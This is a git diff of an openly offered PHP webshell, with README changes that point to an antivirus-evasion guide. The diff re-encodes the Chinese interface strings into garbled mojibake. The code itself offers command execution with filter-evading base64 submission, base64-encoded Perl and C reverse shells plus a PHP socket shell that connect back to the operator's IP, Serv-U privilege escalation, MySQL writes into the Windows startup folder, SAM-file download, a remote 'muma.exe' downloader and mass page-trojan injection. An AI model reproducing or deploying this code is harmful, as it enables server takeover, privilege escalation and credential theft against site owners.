diff --git a/README.md b/README.md index 77b4678..4142577 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,16 @@ ### 具体介绍:https://yzddmr6.tk/2019/09/01/BestShell/ -### 代码开源不含后门,免杀自己做。 +### 代码开源不含后门 + +### 如何利用webshell-venom对大马免杀: +https://yzddmr6.tk/2019/09/03/webshell-venom-3-3/ + +### TODO + +1. 内嵌 `https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD` + +2. 把path参数base64一遍 ## 4.0 更新日志 diff --git a/best_php_shell.php b/shell.php similarity index 82% rename from best_php_shell.php rename to shell.php index 6ef7eb9..3436e36 100644 --- a/best_php_shell.php +++ b/shell.php @@ -1,5 +1,5 @@ 用户或密码错误'; + echo '
û
'; } } islogin($shellname,$myurl); @@ -61,24 +61,24 @@ } $class = array( -"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"), -"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"), -"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文件","scanphp" => "批量查找木马"), -"脚本插件" => array("getcode" => "在线代理") +"Ϣ" => array("upfiles" => "ϴļ","phpinfo" => "Ϣ","info_f" => "ϵͳϢ","phpcode" => "ִPHPű"), +"Ȩ" => array("sqlshell" => "ִSQLִ","mysql_exec" => "MYSQL","myexp" => "MYSQLȨ","servu" => "Serv-UȨ","cmd" => "ִ","linux" => "Ȩ","downloader" => "ļ","port" => "˿ɨ"), +"" => array("guama" => "","tihuan" => "滻","scanfile" => "ļ","scanphp" => "ľ"), +"ű" => array("getcode" => "ߴ") ); -$msg = array("0" => "保存成功","1" => "保存失败","2" => "上传成功","3" => "上传失败","4" => "修改成功","5" => "修改失败","6" => "删除成功","7" => "删除失败"); +$msg = array("0" => "ɹ","1" => "ʧ","2" => "ϴɹ","3" => "ϴʧ","4" => "޸ijɹ","5" => "޸ʧ","6" => "ɾɹ","7" => "ɾʧ"); css_main(); switch($eanver){ case "left": css_left(); html_n("
"); - html_img("title");html_n(" 本地硬盘
"); $i = 2; foreach($class as $name => $array){ @@ -91,8 +91,8 @@ $i++; } html_n("
"); - html_img("title");html_n(" 其它操作
"); html_n(""); break; @@ -105,12 +105,12 @@ $NUM_D = $NUM_F = 0; if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; $ROOT_DIR = File_Mode(); - html_n("
地址:"); - html_n("
"); + html_n("
ַ:"); + html_n("
"); html_n("
"); - html_n(" "); + html_n(" "); html_input("file","upfilet","","      "); - html_input("submit","uploadt","上传"); + html_input("submit","uploadt","ϴ"); if(!empty($_POST['newfile'])){ if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb"; $newfile=base64_decode($_POST['newfile']); @@ -120,10 +120,10 @@ @touch($newfile,@strtotime($_POST['time'])); } html_n('
'); - html_n(''); - html_n(''); + html_a('?eanver=main&path='.uppath($path),'ϼĿ¼'); + html_n(''); + html_n(''); + html_n(''); while($dirs = @$dir->read()){ if($dirs == '.' or $dirs == '..') continue; $dirpath = str_path("$path/$dirs"); @@ -135,9 +135,9 @@ html_img("dir"); html_a('?eanver=main&path='.$dirpath,$dirs); html_n(''); $NUM_F++; } @@ -188,12 +188,12 @@
- - - - - -目录({$NUM_D}) / 文件({$NUM_F})
+ + + + + +Ŀ¼({$NUM_D}) / ļ({$NUM_F}) END; break; @@ -226,7 +226,7 @@ $FILE_CODE = ""; $charset= 'GB2312'; $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8); - if(@file_exists($p)) echo '发现目录下有"同名"文件
'; + if(@file_exists($p)) echo 'Ŀ¼"ͬ"ļ
'; }else{ $jspath=urlencode($p); $FILE_TIME = date('Y-m-d H:i:s',filemtime($p)); @@ -241,20 +241,20 @@ $FILE_CODE = htmlspecialchars($FILE_CODE); } print<<查找内容: - +
: +
-指定编码: - +ָ룺 + END; html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\""); print<<
-
文件修改时间 以二进制形式保存文件(建议使用)
-
-
+
ļ޸ʱ Զʽļ(ʹ)
+
+
END; break; @@ -291,13 +291,13 @@ break; case "perm": - html_n("
'); if(!empty($_POST['path'])){ - html_n(''); if(!empty($_POST['path'])){ - html_n(''); if(!empty($_POST['path'])){ - html_n(''); if(!empty($_POST['path'])){ - html_n(' - + - + @@ -1061,30 +1061,30 @@ function delTank() { case "servu": $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; print<<[执行命令] [添加用户] +
[ִ] [û]
-
ServU端口
-
ServU用户
-
ServU密码
+
ServU˿
+
ServUû
+
ServU
END; if($_GET['o'] == 'adduser') { print<<帐号 -密码 -目录 +
ʺ + +Ŀ¼
END; } else { print<<提权命令
+
Ȩ
END; } -echo '
'; +echo '
'; if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) { echo '
'; @@ -1097,57 +1097,57 @@ function delTank() { $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; $sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10); $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; if(!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10); $recvbuf = @fgets($exp, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "USER ".$_POST['user']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($exp, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "PASS ".$_POST['password']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($exp, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); - echo "发送数据包: site exec ".$_POST["SUCommand"]."
"; + echo "ݰ: site exec ".$_POST["SUCommand"]."
"; $recvbuf = @fgets($exp, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; @fclose($exp); } @fclose($sock); @@ -1163,7 +1163,7 @@ function delTank() { echo 'function SubmitUrl(){ document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value); document.getElementById(\'sendcode\').submit(); - }
'); - html_a('?eanver=main&path='.uppath($path),'上级目录'); - html_n('操作文件属性('.get_current_user().')用户|组修改时间文件大小
ļ('.get_current_user().')û|޸ʱļС
'); - html_n("改名"); - html_n("删除 "); - html_a('?pack='.$dirpath,'打包'); + html_n(""); + html_n("ɾ "); + html_a('?pack='.$dirpath,''); html_n(''); html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm); html_n(''.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs")); @@ -164,19 +164,19 @@ html_a($Fileurls,$files,'target="_blank"'); html_n(''); if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z')) - html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"'); + html_a('?unzip='.$filepath,'ѹ','title="ѹ'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"'); else - html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"'); + html_a('?eanver=editr&p='.$filepath,'༭','title="༭'.$files.'"'); - html_n("改名"); - html_n("删除 "); - html_n("复制"); - html_a('?down='.$filepath,'下载','编辑','title="下载'.$files.'"'); + html_n(""); + html_n("ɾ "); + html_n(""); + html_a('?down='.$filepath,'','༭','title="'.$files.'"'); html_n(''); html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm); html_n(''.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files")); html_n(''.$filetime.''); - html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"'); + html_a('?down='.$filepath,$fsize,'title="'.$files.'"'); html_n('
".$p.' 属性为: '); + html_n("
".$p.' Ϊ: '); if(is_dir($p)){ html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']); }else{ html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']); } - html_input("submit","save","修改"); + html_input("submit","save","޸"); back(); if($_POST['class']){ switch($_POST['class']){ @@ -316,53 +316,53 @@ case "info_f": $dis_func = get_cfg_var("disable_functions"); - $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; + $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "ϴ"; $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);} $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info = array( - array("服务器时间",date("Y年m月d日 h:i:s",time())), - array("服务器域名","".$_SERVER['SERVER_NAME'].""), - array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])), - array("服务器操作系统",PHP_OS), - array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']), - array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']), - array("你的IP",$_SERVER["REMOTE_ADDR"]), - array("Web服务端口",$_SERVER['SERVER_PORT']), - array("PHP运行方式",strtoupper(php_sapi_name())), - array("PHP版本",PHP_VERSION), - array("运行于安全模式",Info_Cfg("safemode")), - array("服务器管理员",$adminmail), - array("本文件路径",myaddress), - array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")), - array("允许使用curl_exec",Info_Fun("curl_exec")), - array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")), - array("显示错误信息 display_errors",Info_Cfg("display_errors")), - array("自动定义全局变量 register_globals",Info_Cfg("register_globals")), + array("ʱ",date("Ymd h:i:s",time())), + array("","".$_SERVER['SERVER_NAME'].""), + array("IPַ",gethostbyname($_SERVER['SERVER_NAME'])), + array("ϵͳ",PHP_OS), + array("ϵͳֱ",$_SERVER['HTTP_ACCEPT_LANGUAGE']), + array("",$_SERVER['SERVER_SOFTWARE']), + array("IP",$_SERVER["REMOTE_ADDR"]), + array("Web˿",$_SERVER['SERVER_PORT']), + array("PHPзʽ",strtoupper(php_sapi_name())), + array("PHP汾",PHP_VERSION), + array("ڰȫģʽ",Info_Cfg("safemode")), + array("Ա",$adminmail), + array("ļ·",myaddress), + array("ʹ URL ļ allow_url_fopen",Info_Cfg("allow_url_fopen")), + array("ʹcurl_exec",Info_Fun("curl_exec")), + array("̬ӿ enable_dl",Info_Cfg("enable_dl")), + array("ʾϢ display_errors",Info_Cfg("display_errors")), + array("Զȫֱ register_globals",Info_Cfg("register_globals")), array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")), - array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")), - array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")), - array("允许最大上传文件 upload_max_filesize",$upsize), - array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"), - array("被禁用的函数 disable_functions",$dis_func), + array("ʹڴ memory_limit",Info_Cfg("memory_limit")), + array("POSTֽ post_max_size",Info_Cfg("post_max_size")), + array("ϴļ upload_max_filesize",$upsize), + array("ʱ max_execution_time",Info_Cfg("max_execution_time").""), + array("õĺ disable_functions",$dis_func), array("phpinfo()",$phpinfo), - array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), - array("图形处理 GD Library",Info_Fun("imageline")), - array("IMAP电子邮件系统",Info_Fun("imap_close")), - array("MySQL数据库",Info_Fun("mysql_close")), - array("SyBase数据库",Info_Fun("sybase_close")), - array("Oracle数据库",Info_Fun("ora_close")), - array("Oracle 8 数据库",Info_Fun("OCILogOff")), - array("PREL相容语法 PCRE",Info_Fun("preg_match")), - array("PDF文档支持",Info_Fun("pdf_close")), - array("Postgre SQL数据库",Info_Fun("pg_close")), - array("SNMP网络管理协议",Info_Fun("snmpget")), - array("压缩文件支持(Zlib)",Info_Fun("gzclose")), - array("XML解析",Info_Fun("xml_set_object")), + array("Ŀǰпռdiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), + array("ͼδ GD Library",Info_Fun("imageline")), + array("IMAPʼϵͳ",Info_Fun("imap_close")), + array("MySQLݿ",Info_Fun("mysql_close")), + array("SyBaseݿ",Info_Fun("sybase_close")), + array("Oracleݿ",Info_Fun("ora_close")), + array("Oracle 8 ݿ",Info_Fun("OCILogOff")), + array("PREL﷨ PCRE",Info_Fun("preg_match")), + array("PDFĵ֧",Info_Fun("pdf_close")), + array("Postgre SQLݿ",Info_Fun("pg_close")), + array("SNMPЭ",Info_Fun("snmpget")), + array("ѹļ֧(Zlib)",Info_Fun("gzclose")), + array("XML",Info_Fun("xml_set_object")), array("FTP",Info_Fun("ftp_login")), - array("ODBC数据库连接",Info_Fun("odbc_close")), - array("Session支持",Info_Fun("session_start")), - array("Socket支持",Info_Fun("fsockopen")), + array("ODBCݿ",Info_Fun("odbc_close")), + array("Session֧",Info_Fun("session_start")), + array("Socket֧",Info_Fun("fsockopen")), ); $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); echo ''; @@ -371,15 +371,15 @@ $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); }catch(Exception $e){} - echo ''."\n"; - echo ''."\n"; - echo ''."\n"; + echo ''."\n"; + echo ''."\n"; + echo ''."\n"; echo '
Terminal Service端口为'.$registry_proxystring.'
Telnet端口为'.$Telnet.'
PcAnywhere端口为'.$PcAnywhere.'
Terminal Service˿Ϊ'.$registry_proxystring.'
Telnet˿Ϊ'.$Telnet.'
PcAnywhere˿Ϊ'.$PcAnywhere.'
'; break; case "cmd": - $res = '回显窗口'; + $res = 'Դ'; $cmd = 'whoami'; if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));} @@ -409,21 +409,21 @@ function SubmitUrl(){ document.getElementById('gform').submit(); } -
执行命令新增很多隐藏函数,外加使用BASE64加密提交,防止被拦(小细节,大成就)
-命令参数 +
ִܶغʹBASE64ύֹСϸڣɾͣ
+ - +
@@ -439,19 +439,19 @@ function SubmitUrl(){ $system=strtoupper(substr(PHP_OS, 0, 3)); print<<使用方法:
- 先在自己电脑运行"nc -vv -l 12388"
- 然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!
+
ʹ÷
+ Լ"nc -vv -l 12388"
+ ȻڴдԵIP,ӣ˷ȫʵãNC
-
你的地址
-
连接端口
-
执行方式
+
Ӷ˿
+
ִзʽ
-
+
END; if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) { @@ -468,11 +468,11 @@ function SubmitUrl(){ "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; - echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/envl_bc成功
' : '创建/tmp/envl_bc失败
'; + echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '/tmp/envl_bcɹ
' : '/tmp/envl_bcʧ
'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; @unlink('/tmp/envl_bc.c'); - echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败'; + echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : 'ִʧ'; } if($_POST['use'] == 'c') { @@ -484,10 +484,10 @@ function SubmitUrl(){ "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; - echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/envl_bc.c成功
' : '创建/tmp/envl_bc.c失败
'; + echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '/tmp/envl_bc.cɹ
' : '/tmp/envl_bc.cʧ
'; $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c'); @unlink('/tmp/envl_bc.c'); - echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败'; + echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : 'ִʧ'; } if($_POST['use'] == 'php') { @@ -515,12 +515,12 @@ function SubmitUrl(){ $host=gethostbyname($host); $proto=getprotobyname("tcp"); if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){ - die("Socket创建失败"); + die("Socketʧ"); } if(($ret=socket_connect($sock,$host,$port))<0){ - die("连接失败"); + die("ʧ"); }else{ - $message="----------------------PHP反弹连接--------------------\n"; + $message="----------------------PHP--------------------\n"; socket_write($sock,$message,strlen($message)); $cwd=str_replace('\\','/',dirname(__FILE__)); while($cmd=socket_read($sock,65535,$proto)){ @@ -566,7 +566,7 @@ function SubmitUrl(){ echo ''; } - echo '
你可以尝试连接端口 (nc -vv -l '.$_POST['yourport'].') '; + echo '
ԳӶ˿ (nc -vv -l '.$_POST['yourport'].') '; } break; @@ -577,7 +577,7 @@ function SubmitUrl(){ { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); - else $MSG_BOX = '连接MYSQL失败'; + else $MSG_BOX = 'MYSQLʧ'; } $downfile = 'c:/windows/repair/sam'; if(!empty($_POST['downfile'])) @@ -599,7 +599,7 @@ function SubmitUrl(){ echo $downcode; exit; } - else $MSG_BOX = '下载文件失败'; + else $MSG_BOX = 'ļʧ'; } $o = isset($_GET['o']) ? $_GET['o'] : ''; print<<
-
[MYSQL执行语句] -[MYSQL上传文件] -[MYSQL下载文件]
+
[MYSQLִ] +[MYSQLϴļ] +[MYSQLļ]
-地址 -端口 -用户 -密码 -库名 +˿ + +
END; if($o == 'u') { - $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs'; + $uppath = 'C:/Documents and Settings/All Users/ʼ˵///exp.vbs'; if(!empty($_POST['uppath'])) { $uppath = $_POST['uppath']; @@ -649,24 +649,24 @@ function SubmitUrl(){ if(@mysql_query($query,$conn)) { $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; - $MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败'; + $MSG_BOX = @mysql_query($query,$conn) ? 'ϴļɹ' : 'ϴļʧ'; } - else $MSG_BOX = '插入临时表失败'; + else $MSG_BOX = 'ʱʧ'; @mysql_query('Drop TABLE IF EXISTS a;',$conn); } - else $MSG_BOX = '创建临时表失败'; + else $MSG_BOX = 'ʱʧ'; } print<<
上传路径 -

选择文件 -
+

ϴ· +

ѡļ +
END; } elseif($o == 'd') { print<<

下载文件 -
+


ļ +
END; } else @@ -677,7 +677,7 @@ function SubmitUrl(){ $msql = base64_decode($msql); if($result = @mysql_query($msql,$conn)) { - $MSG_BOX = '执行SQL语句成功
'; + $MSG_BOX = 'ִSQLɹ
'; $k = 0; while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} } @@ -687,12 +687,12 @@ function SubmitUrl(){
- + END; } if($MSG_BOX != '') echo '
'.$MSG_BOX.'
'; @@ -704,16 +704,16 @@ function SubmitUrl(){ $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<< -
超连接
-
下载到
-
+
+
ص
+
END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '
'; $contents = @file_get_contents($_POST['durl']); - if(!$contents) echo '无法读取要下载的数据'; - else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败'; + if(!$contents) echo '޷ȡҪص'; + else echo File_Write($_POST['dpath'],$contents,'wb') ? 'ļɹ' : 'ļʧ'; echo '
'; } break; @@ -731,14 +731,14 @@ function SubmitUrl(){ if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); - die(html_a('?eanver=sqlshell','连接失败请返回')); + die(html_a('?eanver=sqlshell','ʧ뷵')); } } else{ - die(html_a('?eanver=sqlshell','连接失败请返回')); + die(html_a('?eanver=sqlshell','ʧ뷵')); } $query = mysql_query("SHOW DATABASES",$sqlcon); - html_n('
数据库列表:'); + html_n('
ݿб:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo '  '; @@ -748,17 +748,17 @@ function SubmitUrl(){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('

'); - html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'"); - html_input("submit","doquery","执行"); + html_select(array(0=>"--SQL﷨--",7=>"",8=>"ɾ",9=>"޸",10=>"ݱ",11=>"ɾݱ",12=>"ֶ",13=>"ɾֶ"),0,"onchange='return Full(options[selectedIndex].value)'"); + html_input("submit","doquery","ִ"); html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); html_n('--->'); html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { - echo "执行SQL语句成功"; + echo "ִSQLɹ"; }else{ - echo "出错: ".mysql_error(); + echo ": ".mysql_error(); } } if($_GET['table']){ @@ -795,16 +795,16 @@ function SubmitUrl(){ $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<< -
超连接
-
下载到
-
+
+
ص
+
END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '
'; $contents = @file_get_contents($_POST['durl']); - if(!$contents) echo '无法读取要下载的数据'; - else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败'; + if(!$contents) echo '޷ȡҪص'; + else echo File_Write($_POST['dpath'],$contents,'wb') ? 'ļɹ' : 'ļʧ'; echo '
'; } break; @@ -822,14 +822,14 @@ function SubmitUrl(){ if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); - die(html_a('?eanver=sqlshell','连接失败请返回')); + die(html_a('?eanver=sqlshell','ʧ뷵')); } } else{ - die(html_a('?eanver=sqlshell','连接失败请返回')); + die(html_a('?eanver=sqlshell','ʧ뷵')); } $query = mysql_query("SHOW DATABASES",$sqlcon); - html_n('
数据库列表:'); + html_n('
ݿб:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo '  '; @@ -839,17 +839,17 @@ function SubmitUrl(){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('

'); - html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'"); - html_input("submit","doquery","执行"); + html_select(array(0=>"--SQL﷨--",7=>"",8=>"ɾ",9=>"޸",10=>"ݱ",11=>"ɾݱ",12=>"ֶ",13=>"ɾֶ"),0,"onchange='return Full(options[selectedIndex].value)'"); + html_input("submit","doquery","ִ"); html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); html_n('--->'); html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { - echo "执行SQL语句成功"; + echo "ִSQLɹ"; }else{ - echo "出错: ".mysql_error(); + echo ": ".mysql_error(); } } if($_GET['table']){ @@ -882,8 +882,8 @@ function SubmitUrl(){ break; case "upfiles": - html_n('
服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'
'); - html_input("text","uppath",root_dir,"
上传到路径: ","51"); + html_n('
ϴļС: '.@get_cfg_var('upload_max_filesize').''); + html_input("text","uppath",root_dir,"
ϴ·: ","51"); print<< function addTank(){ @@ -891,7 +891,7 @@ function addTank(){ k=k+1; k=tank.rows.length; newRow=document.all.tank.insertRow(-1) - + newcell=newRow.insertCell() newcell.innerHTML=" " } @@ -908,7 +908,7 @@ function delTank() { } if (checkit) { } else{ - alert("请选择一个要删除的对象"); + alert("ѡһҪɾĶ"); return false; } } @@ -916,17 +916,17 @@ function delTank() {

-
- + +
- +
请选择要上传的文件:
ѡҪϴļ
END; - html_n('
'); + html_n('
'); if($_POST['upfiles']){ foreach ($_FILES["upfile"]["error"] as $key => $error){ if ($error == UPLOAD_ERR_OK){ @@ -945,33 +945,33 @@ function delTank() { $patht = isset($_POST['path']) ? $_POST['path'] : root_dir; $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx"; $codet = isset($_POST['code']) ? $_POST['code'] : ""; - html_n('
